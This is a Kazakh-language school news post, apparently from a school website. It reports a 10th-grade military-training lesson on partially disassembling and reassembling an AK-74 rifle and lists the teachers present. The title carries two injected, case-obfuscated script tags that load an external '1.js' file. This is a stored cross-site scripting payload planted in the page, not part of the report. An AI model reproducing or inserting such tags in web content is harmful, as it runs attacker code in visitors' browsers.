Атыс дайындығы тарауы "Калашников автоматын жартылай бөлшектеу және жинақтау" тақырыбында 10 сынып оқуышларына сабақ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.11.2021

Р. Қошқарбай атындағы №1 ЖОББМ АӘТД пәні мұғалімі А.С.Ауезханов 09.11.21 күні Атыс дайындығы тарауы  "Калашников автоматын жартылай бөлшектеу және жинақтау" тақырыбында 10 сынып оқуышларына сабақ өткізілді. Іс-шара АӘТД оқыту, жақсарту және педагогтардың кәсіби, мәдени, шығармашылық өсуін қамтамасыз ету және  әдістемелік бірлестіктің жоспары бойынша тәжірибе алмасу мақсатында өткізілді. Сабақ барысында оқушылар М.Т. Калашниковтың «Қазақстан және Калашников» атты қысқаша өмірбаянымен танысты. Оқушылар АК-74 автоматын  жартылай бөлшектеуді және жинақтауды іс жүзінде меңгеріп, машықтанды. Аудандық тәжірибе алмасу сабағына аудандық білім беру бөлімінің әдіскері Қорғанбеков Еркебұлан және АӘТД мұғалімдері: Қ.Усенов, Қ.Хасенов, Қ.Закарьянов, Х.Бесжанов, Е.Максутов, Е.Ильясов, А.Шаповалов, С.Кузнецов қатысты.АӘТД пәні әдістемелік бірлестігінің қорытындысы бойынша, сабақ қойылған мақсатына жеткізіліп, орындалғаны туралы пікірлер айтылды. Сабақ оқушылардың патриоттық сезімдерін оятуға ықпал етті.

Просмотров: 928


Пікір қосу



Деректерді қолтаңбаға қосу